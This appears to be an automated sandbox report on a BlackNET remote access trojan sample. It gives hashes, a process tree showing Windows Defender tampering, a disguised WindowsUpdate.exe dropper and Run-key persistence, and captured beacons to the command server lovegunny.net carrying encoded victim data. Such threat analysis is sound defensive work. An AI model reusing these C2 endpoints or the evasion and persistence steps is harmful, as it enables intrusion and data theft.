Analysis

  • max time kernel
    120s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-10-2024 11:34

General

  • Target

    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe

  • Size

    80KB

  • MD5

    05644c696c4cfcd50af83ac4e2f1ff50

  • SHA1

    b6cc01ee14e43facaccf9bfa7007481bb1e04751

  • SHA256

    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7

  • SHA512

    ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab

  • SSDEEP

    1536:dPvK/3zvzVQtCsscKvWBjzJxuOmb54vHTL6lm:diqCspZzVmb5uHv6lm

Malware Config

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • BlackNET payload 1 IoCs
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    "C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3356
    • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:8

Network

  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    lovegunny.net
    WindowsUpdate.exe
    Remote address:
    8.8.8.8:53
    Request
    lovegunny.net
    IN A
    Response
    lovegunny.net
    IN A
    103.27.237.159
  • flag-vn
    GET
    https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
    Host: lovegunny.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:56 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:56 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:56 GMT
    Content-Length: 1245
  • flag-us
    DNS
    140.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    140.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    159.237.27.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    159.237.27.103.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-vn
    GET
    https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
    Host: lovegunny.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:59 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:35:00 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:35:00 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:35:00 GMT
    Content-Length: 1245
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    99.209.201.84.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.209.201.84.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 673255
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AE10BA836F1E40609CB3644ED6232B77 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:46Z
    date: Wed, 23 Oct 2024 11:36:46 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 668226
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AA745BDB1228441D8161E1E5421BB41A Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 944899
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3F65CA758BBA43F2A4FA8E6F88C5EBE1 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 579336
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 10432A1722B0409BA88A038D88889B27 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 761345
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 9A882466A33B49C89EF50A6F5B09EEE0 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 837003
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 6FFCCED3731B42B19DDE5EFEC91DC819 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    DNS
    10.28.171.150.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.28.171.150.in-addr.arpa
    IN PTR
    Response
  • 103.27.237.159:443
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    tls, http
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    1.3kB
    8.8kB
    12
    11

    HTTP Request

    GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404
  • 103.27.237.159:443
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    tls, http
    WindowsUpdate.exe
    1.4kB
    8.9kB
    13
    12

    HTTP Request

    GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404
  • 103.27.237.159:443
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    tls, http
    WindowsUpdate.exe
    698 B
    1.9kB
    7
    5

    HTTP Request

    GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.6kB
    7.3kB
    17
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.5kB
    6.9kB
    16
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.5kB
    6.9kB
    16
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
    662 B
    12
    8
  • 150.171.28.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    157.9kB
    4.6MB
    3344
    3339

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    lovegunny.net
    dns
    WindowsUpdate.exe
    59 B
    75 B
    1
    1

    DNS Request

    lovegunny.net

    DNS Response

    103.27.237.159

  • 8.8.8.8:53
    140.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    140.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    159.237.27.103.in-addr.arpa
    dns
    73 B
    123 B
    1
    1

    DNS Request

    159.237.27.103.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    99.209.201.84.in-addr.arpa
    dns
    72 B
    132 B
    1
    1

    DNS Request

    99.209.201.84.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    10.28.171.150.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    10.28.171.150.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe

    Filesize

    80KB

    MD5

    05644c696c4cfcd50af83ac4e2f1ff50

    SHA1

    b6cc01ee14e43facaccf9bfa7007481bb1e04751

    SHA256

    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7

    SHA512

    ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_biu1b2ww.e1k.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3264-63-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-64-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-62-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-33-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-32-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-31-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

